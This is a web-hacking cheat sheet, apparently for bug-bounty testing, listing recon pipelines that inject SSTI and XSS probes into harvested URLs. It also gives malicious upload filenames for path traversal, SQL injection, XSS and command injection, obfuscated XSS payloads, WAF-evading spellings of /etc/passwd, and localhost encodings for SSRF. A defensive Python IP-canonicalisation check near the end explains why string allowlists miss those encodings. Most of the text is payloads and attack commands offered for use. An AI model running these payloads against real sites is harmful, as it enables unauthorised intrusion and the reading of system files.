waybackurls http://target.com | qsreplace "abc{{9*9}}" > fuzz.txt
ffuf -u FUZZ -w fuzz.txt -replay-proxy http://127.0.0.1:8080/
waybackurls https://abc.com | grep '=' | qsreplace "abc{{9*9}}" | httpx -match-regex 'abc81' -threads 300 -http-proxy http://127.0.0.1:8080/
Then search for abc81 in Burp Suite's search to find responses where the template expression was evaluated.
File upload tests: set the filename to one of the following:
../../../tmp/lol.png
for path traversal
sleep(10)-- -.jpg
for SQLi
<svg onload=alert(document.domain)>.jpg/png
for XSS
; sleep 10;
for command injection
Open DevTools and run (collects every src and href on the page, skipping elements that have neither):
const urls = new Set();
$$('*').forEach(element => {
  for (const value of [element.src, element.href]) {
    if (value) urls.add(value);
  }
});
console.log(...urls);
gospider -a -s abc.com -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>'
<script src=//⑮.₨></script>
img{background-image:url('javascript:alert()')}
<svg/onload=eval(atob('YWxlcnQoJ1hTUycp'))>
<img src=`xx:xx`onerror=alert(1)>
<div/onmouseover='alert(1)'> style="x:">
\";alert('XSS');//
"autofocus/onfocus=alert(1)//
'-alert(1)-'
WAF restriction? Try these alternative forms.
Alternative spellings of /etc/passwd:
/etc/passwd
/e?c/?asswd
/e*c/*asswd
/??c/?asswd
/??c/?assw?
Alternative representations of localhost (127.0.0.1):
0
127.00.1
127.0.01
0.00.0
0.0.00
127.1.0.1
127.10.1
127.1.01
0177.1
0177.0001.0001
0x0.0x0.0x0.0x0
0000.0000.0000.0000
0x7f.0x0.0x0.0x1
0177.0000.0000.0001
0177.0001.0000..0001
0x7f.0x1.0x0.0x1
0x7f.0x1.0x1
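Why a string-based allowlist misses the localhost forms above, and how to check them properly: classic inet_aton accepts one to four dotted parts in decimal, octal or hex, with the last part filling the remaining bytes, so an SSRF filter has to canonicalise the host the same way before comparing. The Python below is an added example, not code from the original page; the names inet_aton_classic and is_local_target and the sample addresses are assumptions of mine.

```python
import ipaddress
import re

# Each dotted part may be hex (0x..), octal (leading 0) or decimal, as classic inet_aton allows.
_PART = re.compile(r"^(0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)$")

def _parse_part(text: str) -> int:
    if not _PART.match(text):
        raise ValueError(f"not a numeric part: {text!r}")
    if text[:2].lower() == "0x":
        return int(text[2:], 16)
    if len(text) > 1 and text[0] == "0":
        return int(text, 8)
    return int(text, 10)

def inet_aton_classic(text: str):
    """Canonicalise an address string the way BSD/glibc inet_aton does.

    Accepts 1 to 4 parts; all but the last must fit in one byte, and the last
    part fills the remaining bytes ("127.1" -> 127.0.0.1). Returns an
    ipaddress.IPv4Address, or None when the string is not accepted.
    """
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    head, last = values[:-1], values[-1]
    remaining = 4 - len(head)
    if any(v > 0xFF for v in head) or last >= 1 << (8 * remaining):
        return None
    packed = 0
    for v in head:
        packed = (packed << 8) | v
    packed = (packed << (8 * remaining)) | last
    return ipaddress.IPv4Address(packed)

def is_local_target(text: str) -> bool:
    """True when the string canonicalises to loopback (127/8) or to 0.0.0.0,
    which connect() on Linux also routes to the local host."""
    addr = inet_aton_classic(text)
    return addr is not None and (addr.is_loopback or addr.is_unspecified)

if __name__ == "__main__":
    # Constructed sample: entries from the list above plus one external address.
    for candidate in ["0", "127.1.01", "0177.1", "0x7f.0x1.0x1", "0177.0001.0000..0001", "93.184.216.34"]:
        print(f"{candidate:>22} -> {inet_aton_classic(candidate)}  local={is_local_target(candidate)}")
```

The double-dot entry in the list is rejected by this parser, as it is by inet_aton. A complete check would also resolve hostnames and apply the same test to the resolved address.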
When testing SharePoint applications, check this file path, which sometimes leads to a directory listing:
/_layouts/mobile/view.aspx
Google dork: /_layouts/mobile/view.aspx